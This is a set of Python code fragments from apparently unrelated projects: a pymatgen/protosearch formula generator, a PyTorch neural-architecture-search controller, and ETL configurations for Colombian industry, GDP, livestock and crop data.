        db_interface (DbInterface): interface to OQMD database,
            by default uses the one pulled from data.matr.io

    Returns:
        (pandas.DataFrame): hypothetical pymatgen structures
            generated and their unique ids from protosearch
    """
    if db_interface is None:
        db_interface = OqmdInterface(source)
    frames = [
        db_interface.create_proto_data_set(chemical_formula=formula)
        for formula in formulas
    ]
    protos = pd.concat(frames)
    # Discard rows protosearch failed to fill in completely.
    protos.dropna(axis=0, how="any", inplace=True)
    # Convert the ASE atoms objects into pymatgen structures.
    adaptor = AseAtomsAdaptor()
    protos["structure"] = [
        adaptor.get_structure(atoms) for atoms in protos["atoms"]
    ]
    # Mc1 doesn't allow underscores in identifiers, so re-key on a
    # dash-separated version of the protosearch structure names.
    protos.index = [
        name.replace('_', '-') for name in protos["structure_name"]
    ]
    return protos
def get_stoichiometric_formulas(n_components, grid=None):
    """
    Generates anonymous stoichiometric coefficient vectors for a set
    of n_components with specified coefficients.

    Args:
        n_components (int): number of components (dimensions)
        grid (list): a range of integers to use as coefficients;
            defaults to 1..7

    Returns:
        (numpy.ndarray): unique stoichiometries from the allowed grid
            of integers, de-duplicated by composition fraction (so e.g.
            (1, 1) and (2, 2) collapse to one entry, keeping the first).
    """
    grid = grid if grid else list(range(1, 8))
    args = [grid for _ in range(n_components)]
    stoics = np.array(list(itertools.product(*args)))
    # Normalize to composition fractions so scaled duplicates coincide.
    fracs = stoics.astype(float) / np.sum(stoics, axis=1)[:, None]
    # Cleanup: dropped the unused return_counts=True / `counts` output.
    _, indices = np.unique(fracs, axis=0, return_index=True)
    return stoics[indices]
def create_formulas(
    bounds,
    charge_balanced=True,
    oxi_states_extend=None,
    oxi_states_override=None,
    all_oxi_states=False,
    grid=None,
    create_subsystems=False,
):
    """
    Creates a list of formulas given the bounds of a chemical space.

    TODO:
        - implement create_subsystems

    Args:
        bounds ([str]): list of elements to bound the space
        charge_balanced (bool): whether to balance oxidation
            states in the generated formulae
        oxi_states_extend ({str: [int]}): dictionary of
            {element: oxidation states} to add on top of the
            element's common oxidation states
        oxi_states_override ({str: [int]}): override for oxidation
            states, see Composition.oxi_state_guesses
        all_oxi_states (bool): global config for oxidation
            states, see Composition.oxi_state_guesses
        grid ([int]): list of integers to use for coefficients
        create_subsystems (bool): whether to create formulas
            for sub-chemical systems, e. g. for Sr-Ti-O,
            whether to create Ti-O and Sr-O

    Returns:
        ([str]): list of chemical formulas
    """
    if create_subsystems:
        raise NotImplementedError("Create subsystems not yet implemented.")
    stoichs = get_stoichiometric_formulas(len(bounds), grid=grid)
    formulas = []
    for stoich in stoichs:
        coeffs = stoich.astype(str).tolist()
        formulas.append("".join(el + c for el, c in zip(bounds, coeffs)))
    if not charge_balanced:
        return formulas
    charge_balanced_formulas = []
    if oxi_states_extend:
        # Bug fix: work on a shallow copy and rebuild lists instead of
        # mutating the caller's oxi_states_override dict/lists in place.
        oxi_states_override = dict(oxi_states_override) if oxi_states_override else {}
        for element, states in oxi_states_extend.items():
            states = states if isinstance(states, list) else [states]
            _states = states + list(Element[element].common_oxidation_states)
            if element in oxi_states_override:
                oxi_states_override[element] = oxi_states_override[element] + states
            else:
                oxi_states_override[element] = _states
    # Keep only formulas for which pymatgen can find at least one
    # charge-neutral oxidation-state assignment.
    for formula in formulas:
        c = Composition(formula)
        if c.oxi_state_guesses(
            oxi_states_override=oxi_states_override, all_oxi_states=all_oxi_states
        ):
            charge_balanced_formulas.append(formula)
    return charge_balanced_formulas
def heuristic_setup(elements):
"""
Helper function to setup a default structure_domain
Args:
elements ([str]): list of elements to use to
generate formulae
Returns:
(int): maximum coefficient for element set
(bool): whether or not charge balancing should be used
"""
grid_defaults = {2: 5, 3: 5}
n_comp = len(elements)
_g = grid_defaults.get(n_comp, 4)
# Charge balance ionic compounds
if {"O", "Cl", "F", "S", | |
<filename>nasframe/architect.py
from nasframe.utils.misc import make_dirs, add_if_doesnt_exist, add_increment
from nasframe.utils.torch import wrap
from nasframe.searchspaces import SearchSpace
from torch.distributions import Categorical
from collections import defaultdict
from os.path import join, exists
import torch.nn as nn
import torch
import copy
class Architect(nn.Module):
"""
Architect neural network.
Args:
search_space (SearchSpace): search space to which this architect instance belongs
state_dims (tuple): graph encoder cell dimensions
cell_type (str): 'lstm' or 'gru'; graph encoder cell type
"""
def __init__(self, search_space, state_dims=(128, 128), cell_type='LSTM'):
    """
    Builds the graph-encoder cells and the per-decision policy/value heads.

    Args:
        search_space (SearchSpace): search space this architect samples from;
            a deep copy is stored so the caller's instance is never mutated.
        state_dims (tuple): graph encoder cell dimensions
        cell_type (str): 'lstm' or 'gru'; graph encoder cell type
    """
    super().__init__()
    self.search_space = copy.deepcopy(search_space)
    self.search_space.reset()
    self.cells = []
    # Chain the cells: each cell's hidden size is the next cell's input size.
    cell = nn.LSTMCell if cell_type.lower() == 'lstm' else nn.GRUCell
    for i, d in enumerate(state_dims[:-1]):
        self.cells.append(cell(d, state_dims[i+1]))
    self.cells = nn.ModuleList(self.cells)
    self.embedding_index = {'state_zero': 0}
    self.policies = {}
    self.values = {}
    # initialize() (defined elsewhere in this class) presumably populates
    # embedding_index, policies and values by walking the search space;
    # it must run before the Embedding below is sized — TODO confirm.
    self.initialize(self.search_space, [])
    self.embedding = nn.Embedding(len(self.embedding_index), state_dims[0])
    # Re-register the dict-held heads in ModuleLists so their parameters
    # are visible to .parameters() / the optimizer.
    self._policy = nn.ModuleList(list(self.policies.values()))
    self._values = nn.ModuleList(list(self.values.values()))
@property
def is_cuda(self):
    """
    True when this architect's parameters live on a CUDA device.
    """
    first_parameter = next(self.parameters())
    return first_parameter.is_cuda
@property
def device(self):
    """
    The ``torch.Device`` on which this architect is located.
    """
    first_parameter = next(self.parameters())
    return first_parameter.device
def reset(self):
    """
    Re-initializes all parameters: Xavier-normal for weight matrices,
    zeros for one-dimensional parameters (biases).
    """
    for param in self.parameters():
        if param.dim() <= 1:
            nn.init.constant_(param, 0)
        else:
            nn.init.xavier_normal_(param)
def init_hidden(self, num_samples):
    """
    Builds the initial encoder state by feeding the ``state_zero``
    embedding, together with zero hidden states, through the graph encoder.
    """
    states = []
    for cell in self.cells:
        # LSTM cells carry (h, c); GRU cells carry h only.
        num_states = 2 if isinstance(cell, nn.LSTMCell) else 1
        zeros = wrap(torch.zeros(num_samples, cell.hidden_size), self.device)
        state = zeros.clone()
        states.append((state,) * num_states)
    input = self.embedding(wrap([0], self.device, dtype=torch.long))
    return self(input, states)
def save(self, prefix='./', name=None, include_space=False):
    """
    Saves architect to a file.

    Args:
        prefix (str): prefix directory of a future save
        name (str): save name; defaults to 'unnamed'
        include_space (bool): whether to save the search space along
            with this architect instance

    Returns:
        str: path to which architect was saved
        (``prefix``/architect/``name``.pth)
    """
    save_dir = join(prefix, 'architect')
    if not exists(save_dir):
        make_dirs(save_dir)
    name = name or 'unnamed'
    path = join(save_dir, f'{name}.pth')
    # Temporarily detach the search space so it is only pickled on request.
    space = self.search_space
    if not include_space:
        self.search_space = None
    torch.save(self, path)
    self.search_space = space
    return path
def forward(self, input, hidden, key=None):
    """
    Performs one forward pass through the graph encoder,
    updating ``hidden`` in place.

    Returns:
        the new hidden state if ``key`` is None, otherwise a
        (logits, values, hidden) tuple from the policy and value
        heads registered under ``key``.
    """
    for idx in range(len(self.cells)):
        new_state = self.cells[idx](input, hidden[idx])
        # GRU cells return a bare tensor; normalize to a sequence.
        if not isinstance(new_state, (list, tuple)):
            new_state = [new_state]
        hidden[idx] = new_state
        input = new_state[0]
    if key is None:
        return hidden
    top = hidden[-1][0]
    return self.policies[key](top), self.values[key](top), hidden
def act(self, inputs, hidden, explore, key, output=None, pick=None):
    """
    Picks an action given the encoded graph predicted so far.

    Args:
        inputs (torch.Tensor): encoded graph representation
        hidden (list): list of encoder cell(s) hidden states
        explore (bool): sample from the policy when True, take the
            argmax otherwise
        key (str): key corresponding to policy and value layers
        output (defaultdict(list), optional): if provided, chosen logprobs,
            chosen values and entropies are appended to its lists instead
            of being returned
        pick (int, optional): index of action to force instead of
            sampling or argmax.

    Returns:
        (action, hidden) when ``output`` is given, otherwise
        (action, hidden, chosen logprobs, chosen values, entropies)
    """
    assert key is not None, ('`key` must not be None for act. '
                             'If you want to update hidden only, call `forward` instead')
    logits, values, hidden = self(inputs, hidden, key)
    dist = Categorical(logits=logits)
    if pick is not None:
        assert pick < logits.size(1)
        action = wrap([pick], self.device, dtype=torch.long)
    else:
        action = dist.sample() if explore else dist.probs.max(1)[1]
    chosen_logprobs = dist.log_prob(action).unsqueeze(1)
    chosen_values = values.gather(1, action.unsqueeze(1))
    entropies = dist.entropy()
    if output is None:
        return action, hidden, chosen_logprobs, chosen_values, entropies
    assert isinstance(output, defaultdict) and output.default_factory == list, \
        '`output` must be a defaultdict with `list` default_factory.'
    output['logprob'].append(chosen_logprobs)
    output['values'].append(chosen_values)
    output['entropies'].append(entropies)
    return action, hidden
def sample(self, explore=True):
    """
    Samples a graph description using the current policy.

    Args:
        explore: whether to explore or exploit only.

    Returns:
        tuple: sampled graph description, log probabilities and predicted
        values of chosen actions, entropies of output distributions
    """
    collected = defaultdict(list)
    description = {}
    hidden = self.init_hidden(1)
    self._subsample(hidden, explore, self.search_space, [], {}, collected, description)
    logprobs = torch.cat(collected['logprob']).transpose(0, 1)
    return (description, logprobs,
            torch.cat(collected['values']), torch.cat(collected['entropies']))
def evaluate_description(self, description):
    """
    Re-picks the described actions (greedily, no exploration) in order to
    obtain log probabilities, predicted values and the entropies of the
    output distributions.

    Args:
        description (dict): description to evaluate

    Returns:
        tuple: description, log probabilities and predicted values of the
        described actions, entropies of output distributions
    """
    description = copy.deepcopy(description)
    collected = defaultdict(list)
    hidden = self.init_hidden(1)
    self._subsample(hidden, False, self.search_space, [], {}, collected, description)
    logprobs = torch.cat(collected['logprob']).transpose(0, 1)
    return (description, logprobs,
            torch.cat(collected['values']), torch.cat(collected['entropies']))
def _subsample(self, hidden, explore, search_space, names, representations, output, description, outer_i=None):
"""
The recursive workhorse of `sample` method.
Args:
hidden (list): previous encoder hidden state
explore (bool): whether to explore the search/action space or exploit only
search_space (SearchSpace): current level of search space
names (list): names of search spaces up to current level
output (defaultdict(list), optional): dict of lists to append outputs to
description (dict): description being generated
outer_i (int): outer iteration ordinal (used in recursion, `None` on depth `0`)
Returns:
list: next hidden state
"""
name = search_space.name
names = copy.deepcopy(names)
names.append(name)
# Those checks were introduced to reuse this method to evaluate model output for already existing description.
if description.get(name) is None:
description[name] = {}
# region num inner prediction
num_inner = self.search_space.eval_(search_space.num_inner, **locals())
# region forcing facilitation
if description.get(f'num_{name}') is None:
forced_inner = self.search_space.eval_(search_space.forced_num_inner, **locals())
max_available = max(num_inner) if isinstance(num_inner, (list, tuple)) else num_inner
assert forced_inner is None or isinstance(forced_inner, int) and 0 < forced_inner <= max_available
if forced_inner is not None:
try: forced_inner = num_inner.index(forced_inner)
except ValueError:
raise ValueError(f'Number of inner search spaces "{forced_inner}" '
'is not present in original search space.')
else:
forced_inner = num_inner.index(description[f'num_{name}'])
# endregion
index = self.embedding_index[f'{name}_start']
index = wrap([index], self.device, dtype=torch.long)
input = self.embedding(index)
if len(num_inner) > 1:
key = f'{"_".join(names[:-1])}_{len(num_inner)}_{name}s'
action, hidden = self.act(input, hidden, explore, key, output, forced_inner)
num_inner = num_inner[action.item()]
else:
hidden = self(input, hidden)
num_inner = num_inner[forced_inner] if forced_inner is not None else num_inner[0]
if description.get(f'num_{name}') is None:
description[f'num_{name}'] = num_inner
# endregion
# region inner space prediction
index = self.embedding_index[f'{num_inner}_{name}s']
index = wrap([index], self.device, dtype=torch.long)
input = self.embedding(index)
encoded_flag = False
for i in range(int(num_inner)):
if description[name].get(i) is None:
description[name][i] = {}
if isinstance(search_space.inner, dict):
for k, v in search_space.inner.items():
v = self.search_space.eval_(v, **locals())
key = f'{"_".join(names[:-1])}_{len(v)}_{k}s'
if isinstance(v, (list, tuple)) and len(v) > 1:
pick = description[name][i].get(k)
if pick is not None:
try: pick = v.index(pick)
except ValueError:
raise ValueError(f'Point "{pick}" is not present in '
f'{k} dimension of the search space.')
action, hidden = self.act(input, hidden, explore, key, output, pick)
choice = v[action.item()]
if pick is None: description[name][i][k] = choice
else: assert choice == description[name][i][k]
if k == 'id':
if choice in representations:
input = representations[choice]
continue
index = self.embedding_index[f'{k}_{choice}']
index = wrap([index], self.device, dtype=torch.long)
input = self.embedding(index)
else:
if description[name][i].get(k) is None:
description[name][i][k] = v[0]
else: assert v[0] == description[name][i][k]
else:
assert isinstance(search_space.inner, (list, tuple, SearchSpace)), \
'Inner search space must be either dict, SearchSpace or list of SearchSpaces.'
if not encoded_flag:
hidden = self(input, hidden)
encoded_flag = True
spaces = [search_space.inner] if isinstance(search_space.inner, SearchSpace) else search_space.inner
for space in spaces:
input = self._subsample(hidden, explore, space, names, representations,
output, description[name][i], i)
hidden = self(input[-1][0], hidden)
index = self.embedding_index[f'{name}_inner_done']
index = wrap([index], self.device, dtype=torch.long)
input = self.embedding(index)
# endregion
# region outer keys prediction
for k, v in search_space.outer.items():
v = self.search_space.eval_(v, **locals())
key = f'{"_".join(names[:-1])}_{len(v)}_{k}s'
if isinstance(v, (list, tuple)) and len(v) > 1:
pick = description.get(k)
if pick is not None:
try: pick = v.index(pick)
except ValueError:
raise ValueError(f'Point "{pick}" is not present in '
f'{k} dimension of the search space.')
action, hidden = self.act(input, hidden, explore, key, output, pick)
choice = v[action.item()]
if pick is None: description[k] = choice
else: assert choice == description[k]
if k == 'id':
if choice in representations:
input = representations[choice]
continue
index = self.embedding_index[f'{k}_{choice}']
index = wrap([index], self.device, dtype=torch.long)
input = self.embedding(index)
else:
if description[name][i].get(k) is None:
description[name][i][k] = v[0]
else: assert v[0] == description[name][i][k]
# endregion
index = self.embedding_index[f'{name}_end']
index = wrap([index], self.device, dtype=torch.long)
input = self.embedding(index)
hidden = self(input, hidden)
if len(names) > 2:
repr_key = f'{names[-2]}' if outer_i is | |
hook_industry(df):
df = df.drop_duplicates(["location", "industry", "year"])
df = df[df.location.notnull()]
df = df[df.year.between(YEAR_MIN_INDUSTRY, YEAR_MAX_INDUSTRY)]
return df
def industry4digit_country_read():
    """Loads the national 4-digit industry data and tags it with the country code."""
    data = pd.read_hdf(prefix_path("Industries/industries_all.hdf"), "data")
    data["country_code"] = "COL"
    return data
# Dataset config: 4-digit (class-level) industry aggregates for the whole
# country. Consumed by the generic ETL pipeline: read -> rename via
# field_mapping -> hook_pre_merge -> classification merge -> facet cuts.
industry4digit_country = {
    "read_function": industry4digit_country_read,
    "field_mapping": {
        "country_code": "location",
        "p_code": "industry",
        "year": "year",
        "all_p_emp": "employment",
        "all_p_wage": "wages",
        "all_p_wagemonth": "monthly_wages",
        "all_p_est": "num_establishments",
        "all_p_pci": "complexity"
    },
    "hook_pre_merge": hook_industry,
    "classification_fields": {
        "location": {
            "classification": location_classification,
            "level": "country"
        },
        "industry": {
            "classification": industry_classification,
            "level": "class"
        },
    },
    "digit_padding": {
        "location": 1,
        "industry": 4
    },
    "facet_fields": ["location", "industry", "year"],
    "facets": {
        # complexity is a per-industry attribute, constant across locations
        ("industry_id", "year"): {
            "complexity": first
        },
        ("location_id", "industry_id", "year"): {
            "employment": first,
            "wages": first,
            "monthly_wages": first,
            "num_establishments": first,
        }
    }
}

# Dataset config: 4-digit industry aggregates per department ("state" columns
# in the source file), including RCA / distance / complexity measures.
industry4digit_department = {
    "read_function": lambda: pd.read_hdf(prefix_path("Industries/industries_state.hdf"), "data"),
    "field_mapping": {
        "state_code": "location",
        "p_code": "industry",
        "year": "year",
        "state_p_emp": "employment",
        "state_p_wage": "wages",
        "state_p_wagemonth": "monthly_wages",
        "state_p_est": "num_establishments",
        "state_p_rca": "rca",
        "state_p_distance_flow": "distance",
        "state_p_cog_flow_pred": "cog",
        "state_all_coi_flow_pred": "industry_coi",
        "all_p_pci": "complexity",
        "state_all_eci": "industry_eci"
    },
    "hook_pre_merge": hook_industry,
    "classification_fields": {
        "location": {
            "classification": location_classification,
            "level": "department"
        },
        "industry": {
            "classification": industry_classification,
            "level": "class"
        },
    },
    "digit_padding": {
        "location": 2,
        "industry": 4
    },
    "facet_fields": ["location", "industry", "year"],
    "facets": {
        # Location-level cut: extensive quantities are summed across
        # industries; per-location measures (eci, coi) are taken as-is.
        ("location_id", "year"): {
            "employment": sum_group,
            "wages": sum_group,
            "monthly_wages": first,
            "num_establishments": sum_group,
            "industry_eci": first,
            "industry_coi": first,
        },
        ("industry_id", "year"): {
            "employment": sum_group,
            "wages": sum_group,
            "monthly_wages": sum_group,
            "num_establishments": sum_group,
            "complexity": first
        },
        ("location_id", "industry_id", "year"): {
            "employment": first,
            "wages": first,
            "monthly_wages": first,
            "num_establishments": first,
            "distance": first,
            "cog": first,
            "rca": first
        }
    }
}
def hook_industry4digit_msa(df):
    """
    Applies the shared industry cleanup, then normalizes MSA codes to the
    6-character form: zero-padded 5 digits plus a trailing '0'.
    """
    df = hook_industry(df)
    codes = df.location.astype(int).astype(str)
    df.location = codes.str.zfill(5) + "0"
    return df
# Dataset config: 4-digit industry aggregates per metropolitan area (MSA).
# Location padding is handled in the hook (zfill(5) + "0"), hence no
# "location" entry under digit_padding here.
industry4digit_msa = {
    "read_function": lambda: pd.read_hdf(prefix_path("Industries/industries_msa.hdf"), "data"),
    "hook_pre_merge": hook_industry4digit_msa,
    "field_mapping": {
        "msa_code": "location",
        "p_code": "industry",
        "year": "year",
        "msa_p_emp": "employment",
        "msa_p_wage": "wages",
        "msa_p_wagemonth": "monthly_wages",
        "msa_p_est": "num_establishments",
        "msa_p_rca": "rca",
        "msa_p_distance_flow": "distance",
        "msa_p_cog_flow_pred": "cog",
        "msa_all_coi_flow_pred": "industry_coi",
        "all_p_pci": "complexity",
        "msa_all_eci": "industry_eci"
    },
    "classification_fields": {
        "location": {
            "classification": location_classification,
            "level": "msa"
        },
        "industry": {
            "classification": industry_classification,
            "level": "class"
        },
    },
    "digit_padding": {
        "industry": 4
    },
    "facet_fields": ["location", "industry", "year"],
    "facets": {
        ("location_id", "year"): {
            "employment": sum_group,
            "wages": sum_group,
            "monthly_wages": first,
            "num_establishments": sum_group,
            "industry_eci": first,
            "industry_coi": first,
        },
        ("industry_id", "year"): {
            "employment": sum_group,
            "wages": sum_group,
            "complexity": first
        },
        ("location_id", "industry_id", "year"): {
            "employment": first,
            "wages": first,
            "monthly_wages": first,
            "num_establishments": first,
            "distance": first,
            "cog": first,
            "rca": first
        }
    }
}

# Dataset config: 4-digit industry aggregates per municipality
# (5-digit municipality codes).
industry4digit_municipality = {
    "read_function": lambda: pd.read_hdf(prefix_path("Industries/industries_muni.hdf"), "data"),
    "hook_pre_merge": hook_industry,
    "field_mapping": {
        "muni_code": "location",
        "p_code": "industry",
        "year": "year",
        "muni_p_emp": "employment",
        "muni_p_wage": "wages",
        "muni_p_wagemonth": "monthly_wages",
        "muni_p_est": "num_establishments",
    },
    "classification_fields": {
        "location": {
            "classification": location_classification,
            "level": "municipality"
        },
        "industry": {
            "classification": industry_classification,
            "level": "class"
        },
    },
    "digit_padding": {
        "location": 5,
        "industry": 4
    },
    "facet_fields": ["location", "industry", "year"],
    "facets": {
        ("location_id", "industry_id", "year"): {
            "employment": first,
            "wages": first,
            "monthly_wages": first,
            "num_establishments": first,
        }
    }
}

# Dataset config: department-level population counts.
population = {
    "read_function": lambda: pd.read_stata(prefix_path("Final_Metadata/col_pop_muni_dept_natl.dta")),
    "hook_pre_merge": lambda df: df[~df[["location", "year", "population"]].duplicated()],
    "field_mapping": {
        "year": "year",
        "dept_code": "location",
        "dept_pop": "population"
    },
    "classification_fields": {
        "location": {
            "classification": location_classification,
            "level": "department"
        },
    },
    "digit_padding": {
        "location": 2
    },
    "facet_fields": ["location", "year"],
    "facets": {
        ("location_id", "year"): {
            "population": first
        }
    }
}

# Dataset config: department-level nominal GDP.
gdp_nominal_department = {
    "read_function": lambda: pd.read_stata(prefix_path("Final_Metadata/col_nomgdp_muni_dept_natl.dta")),
    "hook_pre_merge": lambda df: df.drop_duplicates(["location", "year"]),
    "field_mapping": {
        "dept_code": "location",
        "dept_gdp": "gdp_nominal",
        "year": "year"
    },
    "classification_fields": {
        "location": {
            "classification": location_classification,
            "level": "department"
        },
    },
    "digit_padding": {
        "location": 2
    },
    "facet_fields": ["location", "year"],
    "facets": {
        ("location_id", "year"): {
            "gdp_nominal": first,
        }
    }
}

# Dataset config: department-level real (inflation-adjusted) GDP.
gdp_real_department = {
    "read_function": lambda: pd.read_stata(prefix_path("Final_Metadata/col_realgdp_dept_natl.dta")),
    "field_mapping": {
        "dept_code": "location",
        "real_gdp": "gdp_real",
        "year": "year"
    },
    "classification_fields": {
        "location": {
            "classification": location_classification,
            "level": "department"
        },
    },
    "digit_padding": {
        "location": 2
    },
    "facet_fields": ["location", "year"],
    "facets": {
        ("location_id", "year"): {
            "gdp_real": first,
        }
    }
}
def industry2digit_country_read():
    """Loads the national industry data and tags it with the country code."""
    data = pd.read_hdf(prefix_path("Industries/industries_all.hdf"), "data")
    data["country_code"] = "COL"
    return data
# Dataset config: division-level industry aggregates for the whole country.
# NOTE(review): source columns are named "d3_*" although the target level is
# the 2-digit "division" — presumably the source's own naming; confirm.
industry2digit_country = {
    "read_function": industry2digit_country_read,
    "hook_pre_merge": hook_industry,
    "field_mapping": {
        "country_code": "location",
        "d3_code": "industry",
        "year": "year",
        "all_d3_wage": "wages",
        "all_d3_wagemonth": "monthly_wages",
        "all_d3_emp": "employment",
        "all_d3_est": "num_establishments",
        "all_d3_pci": "complexity"
    },
    "classification_fields": {
        "location": {
            "classification": location_classification,
            "level": "country"
        },
        "industry": {
            "classification": industry_classification,
            "level": "division"
        },
    },
    "digit_padding": {
        "location": 1,
        "industry": 2
    },
    "facet_fields": ["location", "industry", "year"],
    "facets": {
        ("industry_id", "year"): {
            "wages": first,
            "monthly_wages": first,
            "employment": first,
            "num_establishments": first,
            "complexity": first
        }
    }
}

# Dataset config: division-level industry aggregates per department.
industry2digit_department = {
    "read_function": lambda: pd.read_hdf(prefix_path("Industries/industries_state.hdf"), "data"),
    "hook_pre_merge": hook_industry,
    "field_mapping": {
        "state_code": "location",
        "d3_code": "industry",
        "year": "year",
        "state_d3_est": "num_establishments",
        "state_d3_wage": "wages",
        "state_d3_wagemonth": "monthly_wages",
        "state_d3_emp": "employment",
        "state_d3_rca": "rca",
        "state_d3_distance_flow_pred": "distance",
        "state_d3_cog_flow_pred": "cog",
        "all_d3_pci": "complexity"
    },
    "classification_fields": {
        "location": {
            "classification": location_classification,
            "level": "department"
        },
        "industry": {
            "classification": industry_classification,
            "level": "division"
        },
    },
    "digit_padding": {
        "location": 2,
        "industry": 2
    },
    "facet_fields": ["location", "industry", "year"],
    "facets": {
        ("location_id", "industry_id", "year"): {
            "wages": first,
            "monthly_wages": first,
            "employment": first,
            "num_establishments": first,
            "distance": first,
            "cog": first,
            "rca": first
        }
    }
}
def hook_industry2digit_msa(df):
    """
    Applies the shared industry cleanup, then normalizes MSA codes to the
    6-character form: zero-padded 5 digits plus a trailing '0'.
    """
    df = hook_industry(df)
    codes = df.location.astype(int).astype(str)
    df.location = codes.str.zfill(5) + "0"
    return df
# Dataset config: division-level industry aggregates per metropolitan area.
industry2digit_msa = {
    "read_function": lambda: pd.read_hdf(prefix_path("Industries/industries_msa.hdf"), "data"),
    "hook_pre_merge": hook_industry2digit_msa,
    "field_mapping": {
        "msa_code": "location",
        "d3_code": "industry",
        "year": "year",
        "msa_d3_est": "num_establishments",
        "msa_d3_wage": "wages",
        "msa_d3_wagemonth": "monthly_wages",
        "msa_d3_emp": "employment",
        "msa_d3_rca": "rca",
        "msa_d3_distance_flow_pred": "distance",
        "msa_d3_cog_flow_pred": "cog",
        "all_d3_pci": "complexity"
    },
    "classification_fields": {
        "location": {
            "classification": location_classification,
            "level": "msa"
        },
        "industry": {
            "classification": industry_classification,
            "level": "division"
        },
    },
    # NOTE(review): location padding 5 is a no-op here since the hook
    # already produces 6-character codes (zfill(5) + "0") — confirm.
    "digit_padding": {
        "industry": 2,
        "location": 5
    },
    "facet_fields": ["location", "industry", "year"],
    "facets": {
        ("industry_id", "year"): {
            "wages": sum_group,
            "monthly_wages": sum_group,
            "employment": sum_group,
            "num_establishments": sum_group,
            "complexity": first
        },
        ("location_id", "industry_id", "year"): {
            "wages": first,
            "monthly_wages": first,
            "employment": first,
            "num_establishments": first,
            "distance": first,
            "cog": first,
            "rca": first
        }
    }
}

# Dataset config: vacancy counts and wages cross-tabulated by occupation
# (ONET minor group) and industry (CIIU division).
occupation2digit_industry2digit = {
    "read_function": lambda: pd.read_stata(prefix_path("Vacancies/Vacancies_do130_2d-Ind_X_4d-Occ.dta")),
    "field_mapping": {
        "onet_4dig": "occupation",
        "ciiu_2dig": "industry",
        "num_vacantes": "num_vacancies",
        "wage_mean": "average_wages"
    },
    "classification_fields": {
        "occupation": {
            "classification": occupation_classification,
            "level": "minor_group"
        },
        "industry": {
            "classification": industry_classification,
            "level": "division"
        },
    },
    # NOTE(review): industry is padded to 4 digits although it is mapped from
    # a 2-digit CIIU column and classified at division level — confirm this
    # matches how the classification table stores division codes.
    "digit_padding": {
        "occupation": 7,
        "industry": 4
    },
    "facet_fields": ["occupation", "industry"],
    "facets": {
        ("occupation_id", "industry_id"): {
            "average_wages": first,
            "num_vacancies": first,
        }
    }
}
# Dataset config: vacancy counts and wages by occupation (ONET minor group).
occupation2digit = {
    "read_function": lambda: pd.read_stata(prefix_path("Vacancies/Vacancies_do140_4d-Occ.dta")),
    "field_mapping": {
        "onet_4dig": "occupation",
        "num_vacantes": "num_vacancies",
        "wage_mean": "average_wages"
    },
    "classification_fields": {
        "occupation": {
            "classification": occupation_classification,
            "level": "minor_group"
        },
    },
    "digit_padding": {
        "occupation": 7,
    },
    "facet_fields": ["occupation"],
    "facets": {
        # Fix: ("occupation_id") is just a parenthesized string; every other
        # facet key in this module is a tuple (cf. ("location_id",) in
        # livestock_template), so the one-element tuple form is used here.
        ("occupation_id",): {
            "average_wages": first,
            "num_vacancies": first,
        }
    }
}
# Shared template for the livestock datasets; per-level configs below are
# deep copies with read_function / classification level / padding filled in.
livestock_template = {
    "read_function": None,
    "field_mapping": {
        "livestock": "livestock",
        "location_id": "location",
        "livestock_level": "livestock_level",
        "livestock_number": "num_livestock",
        "livestock_farms_number": "num_farms",
        "average_livestock_load": "average_livestock_load",
    },
    "classification_fields": {
        "livestock": {
            "classification": livestock_classification,
            "level": "level1",
        },
        "location": {
            "classification": location_classification,
            # Filled in per level (country / department / municipality).
            "level": None,
        },
    },
    "digit_padding": {
        # Filled in per level.
        "location": None,
    },
    "facet_fields": ["location", "livestock"],
    "facets": {
        ("location_id", "livestock_id"): {
            "num_livestock": first,
            "num_farms": first,
            "average_livestock_load": first,
        },
        ("location_id",): {
            "num_livestock": sum_group,
            "num_farms": sum_group,
            # A load ratio cannot be meaningfully summed across livestock types.
            "average_livestock_load": null,
        }
    }
}
def read_livestock_level1_country():
    """Loads national livestock data and tags it with the country code."""
    data = pd.read_stata(prefix_path("Rural/livestock_Col_2.dta"))
    data["location_id"] = "COL"
    return data
def hook_livestock(df):
    """Lower-cases livestock names and keeps only level1 rows."""
    df["livestock"] = df["livestock"].str.lower()
    return df[df.livestock_level == "level1"]
# Per-level livestock configs: country codes are 3 chars ("COL"),
# department codes 2 digits, municipality codes 5 digits.
livestock_level1_country = copy.deepcopy(livestock_template)
livestock_level1_country["read_function"] = read_livestock_level1_country
livestock_level1_country["hook_pre_merge"] = hook_livestock
livestock_level1_country["classification_fields"]["location"]["level"] = "country"
livestock_level1_country["digit_padding"]["location"] = 3

livestock_level1_department = copy.deepcopy(livestock_template)
livestock_level1_department["read_function"] = lambda: pd.read_stata(prefix_path("Rural/livestock_dept_2.dta"))
livestock_level1_department["hook_pre_merge"] = hook_livestock
livestock_level1_department["classification_fields"]["location"]["level"] = "department"
livestock_level1_department["digit_padding"]["location"] = 2

livestock_level1_municipality = copy.deepcopy(livestock_template)
livestock_level1_municipality["read_function"] = lambda: pd.read_stata(prefix_path("Rural/livestock_muni_2.dta"))
livestock_level1_municipality["hook_pre_merge"] = hook_livestock
livestock_level1_municipality["classification_fields"]["location"]["level"] = "municipality"
livestock_level1_municipality["digit_padding"]["location"] = 5
# Shared template for the agricultural-product datasets (2007-2015 panel);
# per-level configs below are deep copies with the blanks filled in.
agproduct_template = {
    "read_function": None,
    "field_mapping": {
        "location_id": "location",
        "product_name_sp": "agproduct",
        "product_level": "agproduct_level",
        "year": "year",
        "land_sown_has": "land_sown",
        "land_harv_has": "land_harvested",
        "production_tons": "production_tons",
        "yieldtonsperha": "yield_ratio",
        "indexyield": "yield_index",
    },
    "classification_fields": {
        "agproduct": {
            "classification": agproduct_classification,
            "level": "level3",
        },
        "location": {
            "classification": location_classification,
            # Filled in per level.
            "level": None,
        },
    },
    "digit_padding": {
        # Filled in per level.
        "location": None,
    },
    "facet_fields": ["location", "agproduct", "year"],
    "facets": {
        ("location_id", "agproduct_id", "year"): {
            "land_sown": first,
            "land_harvested": first,
            "production_tons": first,
            "yield_ratio": first,
            "yield_index": first,
        }
    }
}
def read_agproduct_level3_country():
    """Loads national agricultural-product data and tags it with the country code."""
    data = pd.read_stata(prefix_path("Rural/agric_2007_2015_Col_final_2.dta"))
    data["location_id"] = "COL"
    return data
def hook_agproduct(df):
    """
    Cleans agricultural-product rows: slugifies product names, keeps only
    level3 rows with a non-empty year inside the supported year window.
    """
    df["agproduct"] = df["agproduct"].map(slugify)
    keep = (df.agproduct_level == "level3") & (df.year != "")
    df = df[keep]
    df.year = df.year.astype(int)
